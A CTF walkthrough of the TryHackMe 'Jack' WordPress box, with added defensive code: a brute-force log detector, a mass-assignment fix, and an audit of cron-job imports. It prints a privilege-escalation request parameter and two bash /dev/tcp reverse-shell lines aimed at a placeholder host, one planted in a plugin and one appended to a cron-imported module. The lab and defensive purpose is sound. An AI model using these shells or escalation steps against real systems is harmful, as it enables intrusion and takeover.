Jack
May 11, 2021
Jack - THM
It's a WordPress blog, so the usual user enumeration vulnerability applies thanks to the login error message. WPScan identifies three users (jack, danny & wendy). Look around for a while, but it becomes clear very quickly that you should try your hand at brute forcing (not a fan, I don't like this in challenges). I don't know if there is a different intended way to gain access, but this worked (although it took some time). I would suggest a brute force against XML-RPC, and don't use a huge wordlist (rockyou); something FASTter should do the trick.
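From the defending side, both techniques mentioned above leave a distinctive trace in the web server access log: a burst of POST requests to xmlrpc.php from one source, and a run of failed logins against wp-login.php (WordPress re-renders the form with a 200 on failure and redirects with a 302 on success). The following detection script is an added example, not part of the original write-up; the log lines are constructed, the 60-second window and the per-source thresholds are assumed tuning values, and the rule names are my own.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

WINDOW = timedelta(seconds=60)   # sliding window (assumed tuning value)
XMLRPC_THRESHOLD = 20            # POSTs to xmlrpc.php per window, per source IP (assumed)
LOGIN_FAIL_THRESHOLD = 5         # failed wp-login.php POSTs per window, per source IP (assumed)


def parse_line(line):
    """Return the fields of one combined-format line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def exceeds_rate(times, threshold, window):
    """True if any span of length `window` contains at least `threshold` events."""
    times = sorted(times)
    start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False


def detect(lines):
    """Run both rules over an iterable of log lines; returns sorted (ip, rule) alerts."""
    xmlrpc = defaultdict(list)
    login_fail = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"].startswith("/xmlrpc.php"):
            xmlrpc[ev["ip"]].append(ev["ts"])
        elif (ev["method"] == "POST" and ev["path"].startswith("/wp-login.php")
              and ev["status"] == 200):
            # 200 here means the login form was shown again, i.e. the attempt failed.
            login_fail[ev["ip"]].append(ev["ts"])
    alerts = []
    for ip, times in xmlrpc.items():
        if exceeds_rate(times, XMLRPC_THRESHOLD, WINDOW):
            alerts.append((ip, "xmlrpc-bruteforce"))
    for ip, times in login_fail.items():
        if exceeds_rate(times, LOGIN_FAIL_THRESHOLD, WINDOW):
            alerts.append((ip, "wp-login-bruteforce"))
    return sorted(alerts)


def build_sample_log():
    """Constructed sample log (not from the page): one XML-RPC burst, one login-guessing run,
    and a couple of benign requests that must not fire."""
    base = datetime(2021, 5, 11, 10, 0, 0, tzinfo=timezone.utc)

    def stamp(sec):
        return (base + timedelta(seconds=sec)).strftime("%d/%b/%Y:%H:%M:%S %z")

    lines = []
    for i in range(25):       # 25 POSTs in 25 s from one source
        lines.append(f'10.0.0.5 - - [{stamp(i)}] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "python-requests/2.25"')
    for i in range(6):        # six failed logins in six seconds
        lines.append(f'192.168.1.20 - - [{stamp(30 + i)}] "POST /wp-login.php HTTP/1.1" 200 2201 "-" "Mozilla/5.0"')
    lines.append(f'172.16.0.9 - - [{stamp(40)}] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append(f'172.16.0.9 - - [{stamp(41)}] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WordPress/5.7"')
    lines.append("not a combined-format line; skipped by the parser")
    return lines


if __name__ == "__main__":
    for ip, rule in detect(build_sample_log()):
        print(f"ALERT {rule} from {ip}")
```

Pipe a real access log into `detect()` line by line to use it outside the sample; the sliding window is what keeps a single legitimate XML-RPC client (the 172.16.0.9 entries) from being mistaken for a brute force.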
Once you have access to WordPress, you will realize you are not an admin. Thankfully, this trick might just get you admin access:
If you have a non admin account, try to intercept the update profile request and add "&ure_other_roles=administrator" in the parameters. This might give you administrative access.
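What makes the trick above work is a mass-assignment bug: the profile-update handler writes whatever parameters arrive in the request, so a role field smuggled in by a non-admin is honoured. The following is an added example of the vulnerable pattern next to an allowlist-based fix; it is not the plugin's code. Only the parameter name `ure_other_roles` comes from the write-up; the field lists, the `actor_can_promote` flag and the sample request are assumed for illustration.

```python
# Fields an ordinary user may change on their own profile (assumed allowlist for this example).
SELF_SERVICE_FIELDS = {"display_name", "email", "url", "description"}

# Fields that change privileges. "ure_other_roles" is the parameter named in the write-up;
# "role" stands in for any other role or capability field an application might expose.
PRIVILEGE_FIELDS = {"role", "ure_other_roles"}


def vulnerable_update(profile, params):
    """Mass-assignment pattern: every submitted parameter is written straight to the profile,
    so a privilege field added to the request by the user is accepted without any check."""
    profile.update(params)
    return profile


def hardened_update(profile, params, actor_can_promote):
    """Allowlist pattern: self-service fields are always accepted, privilege fields only when
    the acting user holds the promote-users capability, and everything else is dropped.
    Rejected keys are returned so the caller can write them to an audit log."""
    rejected = []
    for key, value in params.items():
        if key in SELF_SERVICE_FIELDS:
            profile[key] = value
        elif key in PRIVILEGE_FIELDS and actor_can_promote:
            profile[key] = value
        else:
            rejected.append(key)
    return profile, rejected


def demo():
    """Constructed request: a subscriber updating their name with a role field appended."""
    request = {"display_name": "jack", "ure_other_roles": "administrator"}
    before = {"display_name": "jack", "role": "subscriber"}
    vulnerable = vulnerable_update(dict(before), request)
    hardened, rejected = hardened_update(dict(before), request, actor_can_promote=False)
    return vulnerable, hardened, rejected


if __name__ == "__main__":
    vulnerable, hardened, rejected = demo()
    print("vulnerable handler stored:", vulnerable)
    print("hardened handler stored:  ", hardened)
    print("rejected parameters:      ", rejected)
```

The design point is that the server decides which fields a request may touch from the actor's capability, never from the request itself; the list of rejected keys is worth alerting on, because a legitimate profile form never sends them.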
With administrative access, you can add a line to one of the plugins and activate it to obtain a reverse shell. My line was:
<?php system('bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1"');?>
Once inside, grab the flag and read the note. Search for what it tells you and you should find an SSH key that gives you access as jack. From there, check for hidden processes. Once you find the cron job, you don't have many options to exploit it. The only possibility is to override the imported module, and that is the correct way to go. It is writable, so edit it to your liking to get a reverse shell whenever the cron job runs. There you have your root shell and, of course, your flag.
Technical note: when you append to the module, whenever the cron job runs it loads the whole module into its script (because of the "import <module_name>" line). Besides loading the function definitions and everything else, it also executes your appended line as if it were already part of the job itself. The line I appended was:
system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")
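The root cause behind the cron job step and the technical note above is a privileged script importing a module from a file that a lower-privileged user can write, since Python runs a module's top-level code at import time. The audit script below is an added example (not part of the write-up and not the challenge's cron job): given a script path, it lists the top-level modules the script imports, resolves each the way the interpreter would when running that script (its own directory first, then `sys.path`), and reports any module file that is group- or other-writable or not owned by a trusted uid. The `trusted_uids` default of root is an assumption; the temporary script and module in the `__main__` section are constructed for the demonstration.

```python
import ast
import os
import stat
import sys
import tempfile
from importlib.machinery import PathFinder


def imported_modules(script_path):
    """Top-level module names a script imports via `import x` or `from x import y`."""
    with open(script_path, "r", encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def resolve_module_file(name, script_dir):
    """Path that `import name` resolves to when the script runs: the script's own
    directory is searched first, exactly as the interpreter does for a script."""
    spec = PathFinder.find_spec(name, [script_dir] + sys.path)
    if spec is None or not spec.origin or spec.origin in ("built-in", "frozen"):
        return None  # built-in, frozen, or not importable from here: nothing on disk to check
    return spec.origin


def audit_script_imports(script_path, trusted_uids=(0,)):
    """Return one finding per imported module whose file could be modified by someone
    other than a trusted owner. Each finding lists the module, its path and the problems."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    findings = []
    for name in imported_modules(script_path):
        path = resolve_module_file(name, script_dir)
        if path is None:
            continue
        st = os.stat(path)
        problems = []
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append("group/other writable")
        if st.st_uid not in trusted_uids:
            problems.append(f"owned by uid {st.st_uid}")
        if problems:
            findings.append({"module": name, "path": path, "problems": problems})
    return findings


if __name__ == "__main__":
    # Constructed demonstration: a "cron job" importing a helper module that is world-writable.
    workdir = tempfile.mkdtemp()
    helper = os.path.join(workdir, "helper.py")
    job = os.path.join(workdir, "job.py")
    with open(helper, "w") as fh:
        fh.write("def run():\n    return 'ok'\n")
    with open(job, "w") as fh:
        fh.write("import helper\nhelper.run()\n")
    os.chmod(helper, 0o666)
    for finding in audit_script_imports(job):
        print(f"{finding['module']} ({finding['path']}): {', '.join(finding['problems'])}")
```

Run it against the scripts referenced from root's crontab; a finding against a module in the script's own directory is the exact condition the write-up exploits, and the fix is to make the module (and the directory it lives in) writable only by the account the job runs as.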